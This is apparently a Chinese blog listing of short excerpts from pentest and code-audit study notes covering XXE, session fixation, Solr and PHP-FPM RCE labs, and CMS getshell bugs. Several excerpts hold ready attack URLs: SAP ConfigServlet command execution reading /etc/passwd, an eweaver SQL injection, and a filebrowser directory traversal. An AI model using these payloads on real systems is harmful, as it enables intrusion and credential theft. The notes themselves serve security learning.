摘要:
https://www.cnblogs.com/test404/p/10599981.html + msf 派生 shell 给 Cobalt strike(前提有一个meterpreter) + Cobalt strike 派生 shell 给 MSF(前提有个beaconshell) 之后使用C 阅读全文
posted @ 2020-02-23 10:39
mrhonest
阅读(210)
评论(0)
推荐(0)
摘要:
  
评论(0)
推荐(0)
摘要:
XXE XML外部实体注入(XML External Entity) ======= XML "XML菜鸟教程" DTD中支持单双引号,所以可以通过单双引号间隔使用作为区分嵌套实体和实体之间的关系;在实际使用中,我们通常需要再嵌套一个参数实体,%号是需要处理成 % 如下: %也可写为16进制% XX 阅读全文
posted @ 2020-01-19 17:03
mrhonest
阅读(762)
评论(0)
推荐(0)
该文被密码保护。 阅读全文
posted @ 2020-01-19 11:27
mrhonest
阅读(4)
评论(0)
推荐(0)
摘要:
会话固定(Session fixation)是一种诱骗受害者使用攻击者指定的会话标识(SessionID)的攻击手段。这是攻击者获取合法会话标识的最简单的方法。会话固定也可以看成是会话劫持的一种类型,原因是会话固定的攻击的主要目的同样是获得目标用户的合法会话,不过会话固定还可以是强迫受害者使用攻击者 阅读全文
posted @ 2020-01-16 14:53
mrhonest
阅读(2061)
评论(0)
推荐(1)
摘要:
exp注: CVE 2017 1000367 "Sudo" CVE 2017 1000112 [a memory corruption due to UFO to non UFO path switch] CVE 2017 7494 "Samba Remote execution" CVE 2017 阅读全文
posted @ 2020-01-07 14:41
mrhonest
阅读(846)
评论(0)
推荐(0)
摘要:
文件位置 ./install/index.php 影响版本 PHP V5.0 过程 + 通过获取GET请求判断是安装还是结束安装 + 安装步骤1 + 安装步骤2 + 安装步骤3 + 安装步骤4 解释 安装步骤1 3都没有校验程序是否已经安装过 步骤4是安装成功后的信息 所以只要重新访问./insta 阅读全文
posted @ 2019-12-16 15:10
mrhonest
阅读(761)
评论(0)
推荐(0)
摘要:
起因 正在学习代码审计 看到有人提交了一个注入https://www.cnvd.org.cn/flaw/show/CNVD 2019 42775 想试试看还有没有别的漏洞 受影响版本 v1.6.3 2019 11 24 更新 后台GETSHELL + 后台地址 系统设置 基本设置 高级设置 允许长传 阅读全文
posted @ 2019-12-12 16:17
mrhonest
阅读(2352)
评论(0)
推荐(0)
摘要:
``` url//document/imp/filebrowser.jsp?dir=/etc/ ``` 阅读全文
posted @ 2019-12-09 16:10
mrhonest
阅读(721)
评论(0)
推荐(0)
摘要:
``` URL/ServiceAction/com.eweaver.base.DataAction?sql=select%201,2,3,4,5,6,7,8,9,233%20from%20DUAL%20 ``` 阅读全文
posted @ 2019-12-09 16:08
mrhonest
阅读(687)
评论(0)
推荐(0)
摘要:
```POST /RPC2 HTTP/1.1Host: localhostAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-w... 阅读全文
posted @ 2019-12-09 15:55
mrhonest
阅读(491)
评论(0)
推荐(0)
摘要:
http://xxxxxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat /etc/passwd 阅读全文
posted @ 2019-12-09 15:29
mrhonest
阅读(1298)
评论(0)
推荐(0)
摘要:
php核心配置 php.ini 基本配置 语法 + 大小写敏感 + 运算符 + 空值的表达式 安全模式 + 安全模式 用来限制文档的存取,限制环境变量的存取,控制外部程序的执行. PHP5.4.0移除 + 限制环境变量存取 指定php程序可以改变的环境变量的前缀,当这个选项的值为空时,那么php可以 阅读全文
posted @ 2019-12-03 09:55
mrhonest
阅读(1328)
评论(0)
推荐(1)
摘要:
文件排查 敏感目录文件分析 + tmp目录 + 命令目录 /usr/bin /usr/sbin 开机启动项 + /etc/init.d /etc/init.d是/etc/rc.d/init.d的软链接 文件时间 + 按时间排序查看指定目录下文件 + stat 针对可以文件可以使用stat进行创建修改 阅读全文
posted @ 2019-11-06 16:41
mrhonest
阅读(476)
评论(0)
推荐(0)
摘要:
本机执行 目标机器上连接本机数据库 本机即可读取到目标机器上的passwd文件 修改读取文件 其它利用方式 后话 至于如果在目标机器上连接本机mysql 比如phpmyadmin 阅读全文
posted @ 2019-11-01 15:05
mrhonest
阅读(768)
评论(0)
推荐(0)
摘要:
环境 /vulhub/solr/CVE 2019 0193/ 创建一个集合 正戏 开启params.resource.loader.enabled 命令执行 反弹shell 阅读全文
posted @ 2019-10-31 14:20
mrhonest
阅读(2159)
评论(0)
推荐(0)
摘要:
查看配置 开启日志功能 设置日志存储路径 ; 执行sql语句,写入日志文件 成功写入 阅读全文
posted @ 2019-10-31 10:15
mrhonest
阅读(1023)
评论(0)
推荐(0)
摘要:
语法 | 变量名| 含义| | | | | $0| 整行| | $n| 列数| | $NF| 当前行的最后一列| | NF| 当前行的列数| Action(动作) | 参数| 含义| | | | | print| 打印| | printf| 格式化打印| | exit| 退出awk| | if| 条 阅读全文
posted @ 2019-10-29 12:56
mrhonest
阅读(157)
评论(0)
推荐(0)
摘要:
搭建容器 安装golang 利用程序 https://github.com/neex/phuip fpizdam 安装git Cobra包安装 编译 EXP EXP下载 创建文件 参考:https://github.com/vulhub/vulhub/blob/master/php/CVE 2019 阅读全文
posted @ 2019-10-24 11:31
mrhonest
阅读(1041)
评论(0)
推荐(0)
摘要:
登陆kibana poc 阅读全文
posted @ 2019-10-21 09:56
mrhonest
阅读(2043)
评论(0)
推荐(0)
浙公网安备 33010602011771号